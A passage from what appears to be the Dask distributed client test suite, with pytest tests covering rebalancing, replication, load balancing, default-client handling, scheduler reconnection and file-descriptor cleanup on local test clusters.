    Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
    """
    a, b, c = s.workers
    futures = client.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
    await wait(futures)
    # Wait for heartbeats
    while s.memory.process < 2 ** 29:
        await asyncio.sleep(0.1)
    # Passing empty iterables is not the same as omitting the arguments
    await client.rebalance([])
    await client.rebalance(workers=[])
    assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
        a: 10,
        b: 0,
        c: 0,
    }
    # Limit rebalancing to two arbitrary keys and two arbitrary workers.
    await client.rebalance([futures[3], futures[7]], [a, b])
    assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
        a: 8,
        b: 2,
        c: 0,
    }
    # Unknown worker names are rejected
    with pytest.raises(KeyError):
        await client.rebalance(workers=["notexist"])
def test_rebalance_sync():
    """Synchronous Client.rebalance spreads keys roughly evenly between
    two out-of-process workers."""
    # can't use the 'c' fixture because we need workers to run in a separate process
    with Client(n_workers=2, memory_limit="1 GiB", dashboard_address=":0") as c:
        s = c.cluster.scheduler
        a, b = (ws.address for ws in s.workers.values())
        futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
        wait(futures)
        # Wait for heartbeat
        while s.memory.process < 2 ** 29:
            sleep(0.1)
        assert c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
        c.rebalance()
        ndata = c.run(lambda dask_worker: len(dask_worker.data))
        # Allow for some uncertainty as the unmanaged memory is not stable
        assert sum(ndata.values()) == 10
        assert 3 <= ndata[a] <= 7
        assert 3 <= ndata[b] <= 7
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
    """Client.rebalance() internally waits for unfinished futures"""
    futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
    # Let the futures reach the scheduler
    await asyncio.sleep(0.1)
    # We didn't wait enough for futures to complete. However, Client.rebalance() will
    # block until all futures are completed before invoking Scheduler.rebalance().
    await c.rebalance(futures)
    s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_on_explicit_missing_data(c, s, a, b):
    """rebalance() raises KeyError if explicitly listed futures disappear"""
    f = Future("x", client=c, state="memory")
    with pytest.raises(KeyError, match="Could not rebalance keys:"):
        await c.rebalance(futures=[f])
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
    """A future loses its 'finished' status when the only worker holding its
    data is closed."""
    x = c.submit(inc, 1, workers=[a.address])
    await x
    await a.close()
    while x.status == "finished":
        await asyncio.sleep(0.01)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
    """A task whose only allowed worker dies goes to 'no-worker' state, then
    runs once a new suitable worker joins."""
    x = c.submit(inc, 1, workers=[a.ip])
    await x
    await a.close()
    while x.status == "finished":
        await asyncio.sleep(0.01)
    # with its restriction unsatisfiable, the task is parked as unrunnable
    assert s.tasks[x.key] in s.unrunnable
    assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
    w = await Worker(s.address, loop=s.loop)
    while x.status != "finished":
        await asyncio.sleep(0.01)
    assert s.tasks[x.key] not in s.unrunnable
    result = await x
    assert result == 2
    await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
    """Tasks submitted to an empty cluster run once a worker (nanny) joins."""
    futures = c.map(inc, range(10))
    n = await Nanny(s.address, nthreads=2, loop=s.loop)
    await c.gather(futures)
    await n.close()
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
    """When a dependency is fetched from a peer, the scheduler records the
    fetching worker as an additional holder of that key."""
    [x] = await c.scatter([1], workers=a.address)
    y = c.submit(inc, x, workers=b.ip)
    await y
    assert b.data[x.key] == 1
    assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
    assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
    s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
    """Submitting a task that depends on a cancelled future raises
    CancelledError immediately."""
    x = c.submit(inc, 1)
    await x
    await c.cancel(x)
    with pytest.raises(CancelledError):
        c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
    """Scheduler.replicate copies keys to exactly n workers."""
    [a, b] = await c.scatter([1, 2])
    await s.replicate(keys=[a.key, b.key], n=5)
    s.validate_state()
    assert len(s.tasks[a.key].who_has) == 5
    assert len(s.tasks[b.key].who_has) == 5
    assert sum(a.key in w.data for w in workers) == 5
    assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
    """replicate and rebalance handle tuple-form dask keys like ('x', 1)."""
    x = delayed(inc)(1, dask_key_name=("x", 1))
    f = c.persist(x)
    await c.replicate(f, n=5)
    s.validate_state()
    assert a.data and b.data
    await c.rebalance(f)
    s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
    """Scheduler.replicate honors the ``workers=`` restriction, supports
    de-replication (n=1), and n=None meaning all workers."""
    [a, b] = await c.scatter([1, 2], workers=[workers[0].address])
    await s.replicate(
        keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
    )
    # replicas only on the first five workers
    assert len(s.tasks[a.key].who_has) == 5
    assert len(s.tasks[b.key].who_has) == 5
    assert sum(a.key in w.data for w in workers[:5]) == 5
    assert sum(b.key in w.data for w in workers[:5]) == 5
    assert sum(a.key in w.data for w in workers[5:]) == 0
    assert sum(b.key in w.data for w in workers[5:]) == 0
    # shrink back down to a single replica
    await s.replicate(keys=[a.key, b.key], n=1)
    assert len(s.tasks[a.key].who_has) == 1
    assert len(s.tasks[b.key].who_has) == 1
    assert sum(a.key in w.data for w in workers) == 1
    assert sum(b.key in w.data for w in workers) == 1
    s.validate_state()
    await s.replicate(keys=[a.key, b.key], n=None)  # all
    assert len(s.tasks[a.key].who_has) == 10
    assert len(s.tasks[b.key].who_has) == 10
    s.validate_state()
    # n=1 within a restricted pool drops surplus copies only inside the pool
    await s.replicate(
        keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
    )
    assert sum(a.key in w.data for w in workers[:5]) == 1
    assert sum(b.key in w.data for w in workers[:5]) == 1
    assert sum(a.key in w.data for w in workers[5:]) == 5
    assert sum(b.key in w.data for w in workers[5:]) == 5
    s.validate_state()
class CountSerialization:
    """Counter of pickle round-trips: ``n`` starts at 0 and each unpickling
    produces an object whose ``n`` is one higher than the pickled value."""

    def __init__(self):
        self.n = 0

    def __getstate__(self):
        return self.n

    def __setstate__(self, n):
        self.n = n + 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
    """Replication fans out tree-wise: at least one copy was re-serialized
    from a worker rather than all coming straight from the source."""
    obj = CountSerialization()
    [future] = await c.scatter([obj])
    await s.replicate(keys=[future.key], n=10)
    max_count = max(w.data[future.key].n for w in workers)
    assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
    """Client.replicate grows, shrinks, and (with no n) maximizes the
    replica count of the given futures."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    await c.replicate([x, y], n=5)
    assert len(s.tasks[x.key].who_has) == 5
    assert len(s.tasks[y.key].who_has) == 5
    await c.replicate([x, y], n=3)
    assert len(s.tasks[x.key].who_has) == 3
    assert len(s.tasks[y.key].who_has) == 3
    await c.replicate([x, y])  # default: replicate to all workers
    s.validate_state()
    assert len(s.tasks[x.key].who_has) == 10
    assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(
    client=True,
    nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
)
async def test_client_replicate_host(client, s, a, b, c):
    """Client.replicate accepts host names (not just full addresses) in the
    ``workers=`` argument, matching every worker on that host."""
    aws = s.workers[a.address]
    bws = s.workers[b.address]
    cws = s.workers[c.address]
    x = client.submit(inc, 1, workers="127.0.0.2")
    await wait([x])
    assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
    await client.replicate([x], workers=["127.0.0.2"])
    assert s.tasks[x.key].who_has == {bws, cws}
    await client.replicate([x], workers=["127.0.0.1"])
    assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
    """Synchronous Client.replicate copies keys to n workers; n=0 is invalid."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    c.replicate([x, y], n=2)
    who_has = c.who_has()
    assert len(who_has[x.key]) == len(who_has[y.key]) == 2
    with pytest.raises(ValueError):
        c.replicate([x], n=0)
    assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
    """The scheduler's per-prefix duration estimate tracks recent task
    runtimes and adapts quickly when tasks get faster."""
    future = c.submit(slowinc, 1, delay=0.2)  # slow
    await wait(future)
    assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
    futures = c.map(slowinc, range(10), delay=0)  # very fast
    await wait(futures)
    assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
    """Subsequent work is spread across both workers even after very fast
    seed tasks were pinned to specific workers."""
    x = c.submit(inc, 1, workers=a.address)  # very fast
    y = c.submit(inc, 2, workers=b.address)  # very fast
    await wait([x, y])
    futures = c.map(inc, range(2, 11))
    await wait(futures)
    assert any(f.key in a.data for f in futures)
    assert any(f.key in b.data for f in futures)
    # assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
    """Two initial tasks are balanced one-per-worker."""
    x, y = c.map(inc, [1, 2])
    await wait([x, y])
    assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
    """Adjacent tasks should be co-located on the same worker in pairs."""
    w, x, y, z = c.map(inc, [1, 2, 3, 4])
    await wait([w, x, y, z])
    groups = [set(a.data), set(b.data)]
    assert {w.key, x.key} in groups
    assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
    """Four submits land one per single-threaded worker."""
    L = [c.submit(slowinc, i) for i in range(4)]
    await wait(L)
    for w in workers:
        assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
    """Submissions depending on broadcast data still balance one per worker
    (each worker ends with the broadcast value plus its own result)."""
    [x] = await c.scatter([10], broadcast=True)
    L = [c.submit(slowinc, x, pure=False) for i in range(4)]
    await wait(L)
    for w in workers:
        assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
    """Each worker's processing queues should be kept at least as deep as
    its thread count while work is available."""
    for delay in [0, 0.01, 0.1]:
        futures = c.map(slowinc, range(100), delay=delay)
        futures = c.map(slowinc, futures, delay=delay / 10)
        # NOTE(review): `if s.tasks` can never be true inside
        # `while not s.tasks`, so the saturation assertion below appears
        # unreachable — the loop only waits for tasks to appear. Verify intent.
        while not s.tasks:
            if s.tasks:
                assert all(
                    len(p) >= 20
                    for w in s.workers.values()
                    for p in w.processing.values()
                )
            await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
    """Same saturation check as above, but with randomized task durations."""
    for delay in [0, 0.01, 0.1]:
        futures = c.map(randominc, range(100), scale=0.1)
        # NOTE(review): same dead-code pattern as test_scheduler_saturates_cores
        # — the inner `if s.tasks` is unreachable inside `while not s.tasks`.
        while not s.tasks:
            if s.tasks:
                assert all(
                    len(p) >= 20
                    for w in s.workers.values()
                    for p in w.processing.values()
                )
            await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
    """Cancelling an in-flight task removes it from every worker's
    processing set on the scheduler."""
    # importorskip keeps the test skipped when dask.array is unavailable;
    # the binding itself is otherwise unused
    da = pytest.importorskip("dask.array")
    x = c.submit(slowinc, 1, delay=0.2)
    while not s.tasks:
        await asyncio.sleep(0.01)
    await c.cancel(x)
    while any(v for w in s.workers.values() for v in w.processing):
        await asyncio.sleep(0.01)
    s.validate_state()
def test_default_get():
    """set_as_default=True installs the client as dask's default scheduler
    (and config) for its lifetime; set_as_default=False leaves it alone.
    Defaults restore correctly, including with nested clients."""
    with cluster() as (s, [a, b]):
        pre_get = dask.base.get_scheduler()
        pytest.raises(KeyError, dask.config.get, "shuffle")
        with Client(s["address"], set_as_default=True) as c:
            assert dask.base.get_scheduler() == c.get
            assert dask.config.get("shuffle") == "tasks"
        # leaving the context restores the previous scheduler and config
        assert dask.base.get_scheduler() == pre_get
        pytest.raises(KeyError, dask.config.get, "shuffle")
        c = Client(s["address"], set_as_default=False)
        assert dask.base.get_scheduler() == pre_get
        pytest.raises(KeyError, dask.config.get, "shuffle")
        c.close()
        c = Client(s["address"], set_as_default=True)
        assert dask.config.get("shuffle") == "tasks"
        assert dask.base.get_scheduler() == c.get
        c.close()
        assert dask.base.get_scheduler() == pre_get
        pytest.raises(KeyError, dask.config.get, "shuffle")
        with Client(s["address"]) as c:
            assert dask.base.get_scheduler() == c.get
        with Client(s["address"], set_as_default=False) as c:
            assert dask.base.get_scheduler() != c.get
        assert dask.base.get_scheduler() != c.get
        # nested defaulting clients unwind in LIFO order
        with Client(s["address"], set_as_default=True) as c1:
            assert dask.base.get_scheduler() == c1.get
            with Client(s["address"], set_as_default=True) as c2:
                assert dask.base.get_scheduler() == c2.get
            assert dask.base.get_scheduler() == c1.get
        assert dask.base.get_scheduler() == pre_get
@gen_cluster()
async def test_set_as_default(s, a, b):
    """default_client() tracks clients created with set_as_default=True and
    raises ValueError once none remain."""
    with pytest.raises(ValueError):
        default_client()
    async with Client(s.address, set_as_default=False, asynchronous=True) as c1:
        with pytest.raises(ValueError):
            default_client()
        async with Client(s.address, set_as_default=True, asynchronous=True) as c2:
            assert default_client() is c2
            async with Client(s.address, set_as_default=True, asynchronous=True) as c3:
                assert default_client() is c3
                async with Client(
                    s.address, set_as_default=False, asynchronous=True
                ) as c4:
                    assert default_client() is c3
                    # a dropped scheduler comm reconnects without changing
                    # the default client
                    await c4.scheduler_comm.close()
                    while c4.status != "running":
                        await asyncio.sleep(0.01)
                    assert default_client() is c3
    with pytest.raises(ValueError):
        default_client()
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
    """Client.processing reports per-worker in-flight tasks and can be
    filtered with ``workers=``."""
    processing = await c.processing()
    assert processing == valmap(tuple, s.processing)
    futures = c.map(
        slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
    )
    await asyncio.sleep(0.2)
    x = await c.processing()
    assert set(x) == {a.address, b.address}
    x = await c.processing(workers=[a.address])
    assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
    """The scheduler RPC endpoints (ncores, has_what, nbytes, who_has)
    mirror the scheduler's internal state, with and without filters."""
    futures = c.map(inc, range(10))
    await wait(futures)
    x = await c.scheduler.ncores()
    assert x == s.nthreads
    x = await c.scheduler.ncores(workers=[a.address])
    assert x == {a.address: s.nthreads[a.address]}
    x = await c.scheduler.has_what()
    assert valmap(sorted, x) == valmap(sorted, s.has_what)
    x = await c.scheduler.has_what(workers=[a.address])
    assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
    x = await c.scheduler.nbytes(summary=False)
    assert x == s.get_nbytes(summary=False)
    x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
    assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
    x = await c.scheduler.who_has()
    assert valmap(sorted, x) == valmap(sorted, s.who_has)
    x = await c.scheduler.who_has(keys=[futures[0].key])
    assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
    """Assert two mappings have identical key sets and, per key, values that
    compare equal element-wise (order matters)."""
    assert expected.keys() == actual.keys()
    for key, actual_value in actual.items():
        assert list(expected[key]) == list(actual_value)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
    """has_what / who_has queries stay consistent after workers holding the
    data are closed, including for explicitly requested dead entries."""
    x = c.submit(inc, 1, workers=[u.address])
    y = await c.scatter(3, workers=[v.address])
    await wait([x, y])
    ua, va, wa = u.address, v.address, w.address
    d = await c.scheduler.has_what()
    assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
    d = await c.scheduler.has_what(workers=[ua, va])
    assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
    d = await c.scheduler.who_has()
    assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
    d = await c.scheduler.who_has(keys=[x.key, y.key])
    assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
    await u.close()
    await v.close()
    d = await c.scheduler.has_what()
    assert_dict_key_equal(d, {wa: []})
    d = await c.scheduler.has_what(workers=[ua, va])
    assert_dict_key_equal(d, {ua: [], va: []})
    # The scattered key cannot be recomputed so it is forgotten
    d = await c.scheduler.who_has()
    assert_dict_key_equal(d, {x.key: []})
    # ... but when passed explicitly, it is included in the result
    d = await c.scheduler.who_has(keys=[x.key, y.key])
    assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
    client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
    """A task that kills its worker process raises KilledWorker on the
    client and is logged by the scheduler."""
    f = c.submit(sys.exit, 0)
    with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
        with pytest.raises(KilledWorker) as info:
            await f
    text = logger.getvalue()
    assert f.key in text
    assert info.value.last_worker.nanny in {a.address, b.address}
    await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
    """Synchronous Client.processing accepts a single address or a list and
    returns only the requested workers."""
    processing = c.processing()
    assert not any(v for v in processing.values())
    futures = c.map(
        slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
    )
    sleep(0.2)
    aa = a["address"]
    bb = b["address"]
    processing = c.processing()
    assert set(c.processing(aa)) == {aa}
    assert set(c.processing([aa])) == {aa}
    c.cancel(futures)
def test_close_idempotent(c):
    """Repeated Client.close calls after the first must be harmless no-ops."""
    for _ in range(3):
        c.close()
@nodebug
def test_get_returns_early(c):
    """Client.get returns promptly once any task errors, releases the failed
    computation's futures, and does not release unrelated live futures."""
    start = time()
    with suppress(RuntimeError):
        result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
    assert time() < start + 0.5
    # Futures should be released and forgotten
    wait_for(lambda: not c.futures, timeout=0.1)
    wait_for(lambda: not any(c.processing().values()), timeout=3)
    x = c.submit(inc, 1)
    x.result()
    with suppress(RuntimeError):
        result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
    # a pre-existing future reused in the failing graph must survive
    assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True, timeout=60)
async def test_Client_clears_references_after_restart(c, s, a, b):
    """Client.restart drops refcounts for pre-restart futures, and they stay
    gone after the future object is garbage collected."""
    x = c.submit(inc, 1)
    assert x.key in c.refcount
    await c.restart()
    assert x.key not in c.refcount
    key = x.key
    del x
    import gc
    gc.collect()
    await asyncio.sleep(0)
    assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
    """A restart that exceeds its timeout is reported in the client log."""
    with captured_logger(logging.getLogger("distributed.client")) as logger:
        await c.restart(timeout="0.5s")
    text = logger.getvalue()
    assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
    """After a Client.get fails, remaining in-flight sibling tasks are
    promptly cancelled rather than left running."""
    with pytest.raises(RuntimeError):
        c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
    start = time()
    while any(c.processing().values()):
        sleep(0.01)
        assert time() < start + 0.5
def test_as_completed_list(c):
    """as_completed over a list of futures yields every future, and their
    gathered results match the submitted work."""
    futures = c.map(inc, range(5))
    completed = list(as_completed(futures))
    assert set(c.gather(completed)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
    """as_completed(..., with_results=True) yields (future, result) pairs
    covering exactly the input futures."""
    futures = c.map(inc, range(5))
    pairs = list(as_completed(futures, with_results=True))
    assert {result for _, result in pairs} == {1, 2, 3, 4, 5}
    assert {future for future, _ in pairs} == set(futures)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
    """as_completed(...).batches() yields list/tuple chunks that together
    cover every input future (or every result with with_results=True)."""
    n = 50
    futures = c.map(slowinc, range(n), delay=0.01)
    out = []
    for batch in as_completed(futures, with_results=with_results).batches():
        assert isinstance(batch, (tuple, list))
        sleep(0.05)
        out.extend(batch)
    assert len(out) == n
    if with_results:
        assert set(pluck(1, out)) == set(range(1, n + 1))
    else:
        assert set(out) == set(futures)
def test_as_completed_next_batch(c):
    """next_batch(block=False) may return an empty list while nothing has
    finished; blocking calls drain the iterator to emptiness."""
    futures = c.map(slowinc, range(2), delay=0.1)
    ac = as_completed(futures)
    assert not ac.is_empty()
    assert ac.next_batch(block=False) == []
    assert set(ac.next_batch(block=True)).issubset(futures)
    while not ac.is_empty():
        assert set(ac.next_batch(block=True)).issubset(futures)
    assert ac.is_empty()
    assert not ac.has_ready()
@gen_cluster(nthreads=[])
async def test_status(s):
    """Client.status transitions from 'running' to 'closed' on close."""
    c = await Client(s.address, asynchronous=True)
    assert c.status == "running"
    x = c.submit(inc, 1)
    await c.close()
    assert c.status == "closed"
@gen_cluster(client=True)
async def test_async_whowhat(c, s, a, b):
    """Async who_has/has_what return the typed WhoHas/HasWhat mappings with
    tuple-valued entries."""
    [x] = await c.scatter([1], workers=a.address)
    who_has = await c.who_has()
    has_what = await c.has_what()
    assert type(who_has) is WhoHas
    assert type(has_what) is HasWhat
    assert who_has == {x.key: (a.address,)}
    assert has_what == {a.address: (x.key,), b.address: ()}
def test_client_repr_html(c):
    """Synchronous who_has/has_what also return the typed WhoHas/HasWhat
    mappings."""
    # NOTE(review): the name suggests this exercises the HTML repr, but the
    # body only checks the result types of who_has/has_what — the typed
    # results presumably carry the _repr_html_; confirm against WhoHas/HasWhat.
    x = c.submit(inc, 1)
    who_has = c.who_has()
    has_what = c.has_what()
    assert type(who_has) is WhoHas
    assert type(has_what) is HasWhat
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
    """With optimize_graph=False intermediate keys survive on the scheduler;
    with optimize_graph=True they are fused away. Checked for both
    Client.persist and Client.compute."""
    i = 10
    for method in [c.persist, c.compute]:
        b = db.range(i, npartitions=2)
        i += 1
        b2 = b.map(inc)
        b3 = b2.map(inc)
        b4 = method(b3, optimize_graph=False)
        await wait(b4)
        assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
        b = db.range(i, npartitions=2)
        i += 1
        b2 = b.map(inc)
        b3 = b2.map(inc)
        b4 = method(b3, optimize_graph=True)
        await wait(b4)
        assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
    """Scattering to a workerless cluster times out with TimeoutError."""
    with pytest.raises(TimeoutError):
        await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
    """When the scheduler process dies, the client cancels outstanding
    futures and enters 'connecting'; when a new scheduler appears on the
    same port, the client reconnects and works again."""
    w = Worker("127.0.0.1", 9393, loop=loop)
    loop.add_callback(w.start)
    scheduler_cli = [
        "dask-scheduler",
        "--host",
        "127.0.0.1",
        "--port",
        "9393",
        "--no-dashboard",
    ]
    with popen(scheduler_cli) as s:
        c = Client("127.0.0.1:9393", loop=loop)
        start = time()
        while len(c.nthreads()) != 1:
            sleep(0.1)
            assert time() < start + 3
        x = c.submit(inc, 1)
        assert x.result() == 2
    # scheduler process is gone; client should notice and cancel futures
    start = time()
    while c.status != "connecting":
        assert time() < start + 5
        sleep(0.01)
    assert x.status == "cancelled"
    with pytest.raises(CancelledError):
        x.result()
    # a fresh scheduler on the same address lets the client recover
    with popen(scheduler_cli) as s:
        start = time()
        while c.status != "running":
            sleep(0.1)
            assert time() < start + 5
        start = time()
        while len(c.nthreads()) != 1:
            sleep(0.05)
            assert time() < start + 15
        x = c.submit(inc, 1)
        assert x.result() == 2
    # after the second shutdown, pending results eventually cancel
    start = time()
    while True:
        try:
            x.result()
            assert False
        except CommClosedError:
            continue
        except CancelledError:
            break
        assert time() < start + 5
        sleep(0.1)
    sync(loop, w.close)
    c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
    """A client whose scheduler vanishes logs a reconnect failure and closes."""
    with captured_logger(logging.getLogger("distributed.client")) as logger:
        await s.close()
        while c.status != "closed":
            await c._update_scheduler_info()
            await asyncio.sleep(0.05)
    text = logger.getvalue()
    assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
    """Churning many short-lived workers/nannies must not leak file
    descriptors once everything has been shut down."""
    proc = psutil.Process()
    with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
        gc.collect()
        before = proc.num_fds()  # fd baseline to compare against at the end
        done = Semaphore(0)
        running = weakref.WeakKeyDictionary()
        workers = set()
        status = True
        async def start_worker(sleep, duration, repeat=1):
            # repeatedly start a worker, let it live `duration`, then close it
            for i in range(repeat):
                await asyncio.sleep(sleep)
                if not status:
                    return
                w = worker(s["address"], loop=loop)
                running[w] = None
                await w
                workers.add(w)
                addr = w.worker_address
                running[w] = addr
                await asyncio.sleep(duration)
                await w.close()
                del w
                await asyncio.sleep(0)
            done.release()
        for i in range(count):
            loop.add_callback(
                start_worker, random.random() / 5, random.random() / 5, repeat=repeat
            )
        with Client(s["address"], loop=loop) as c:
            sleep(1)
            for i in range(count):
                done.acquire(timeout=5)
                gc.collect()
                if not running:
                    break
            start = time()
            while c.nthreads():
                sleep(0.2)
                assert time() < start + 10
            while len(workers) < count * repeat:
                sleep(0.2)
            status = False
            [c.sync(w.close) for w in list(workers)]
            for w in workers:
                assert w.status == Status.closed
    start = time()
    while proc.num_fds() > before:
        print("fds:", before, proc.num_fds())
        sleep(0.1)
        if time() > start + 10:
            if worker == Worker:  # this is an esoteric case
                print("File descriptors did not clean up")
                break
            else:
                raise ValueError("File descriptors did not clean up")
@gen_cluster()
async def test_idempotence(s, a, b):
    """Submitting an identical task from a second client (same key) must not
    produce additional scheduler transitions — for successes, errors, and
    simultaneous submissions alike."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)
    # Submit
    x = c.submit(inc, 1)
    await x
    log = list(s.transition_log)
    len_single_submit = len(log)  # see last assert
    y = f.submit(inc, 1)
    assert x.key == y.key
    await y
    await asyncio.sleep(0.1)
    log2 = list(s.transition_log)
    assert log == log2
    # Error
    a = c.submit(div, 1, 0)
    await wait(a)
    assert a.status == "error"
    log = list(s.transition_log)
    b = f.submit(div, 1, 0)
    assert a.key == b.key
    await wait(b)
    await asyncio.sleep(0.1)
    log2 = list(s.transition_log)
    assert log == log2
    s.transition_log.clear()
    # Simultaneous Submit
    d = c.submit(inc, 2)
    e = c.submit(inc, 2)
    await wait([d, e])
    assert len(s.transition_log) == len_single_submit
    await c.close()
    await f.close()
def test_scheduler_info(c):
    """Client.scheduler_info returns a dict with a float start time and an
    entry per worker."""
    info = c.scheduler_info()
    assert isinstance(info, dict)
    assert isinstance(info["started"], float)
    assert len(info["workers"]) == 2
def test_write_scheduler_file(c):
    """A written scheduler file lets a second client connect to the same
    scheduler; writing twice on one client raises ValueError."""
    info = c.scheduler_info()
    with tmpfile("json") as scheduler_file:
        c.write_scheduler_file(scheduler_file)
        with Client(scheduler_file=scheduler_file) as c2:
            info2 = c2.scheduler_info()
            assert c.scheduler.address == c2.scheduler.address
        # test that a ValueError is raised if the scheduler_file
        # attribute is already set
        with pytest.raises(ValueError):
            c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
    """Client.get_versions reports scheduler, client, and worker versions;
    check=True and packages=[...] also work."""
    requests = pytest.importorskip("requests")
    v = c.get_versions()
    assert v["scheduler"] is not None
    assert v["client"] is not None
    assert len(v["workers"]) == 2
    for k, v in v["workers"].items():
        assert v is not None
    c.get_versions(check=True)
    # smoke test for versions
    # that this does not raise
    v = c.get_versions(packages=["requests"])
    assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
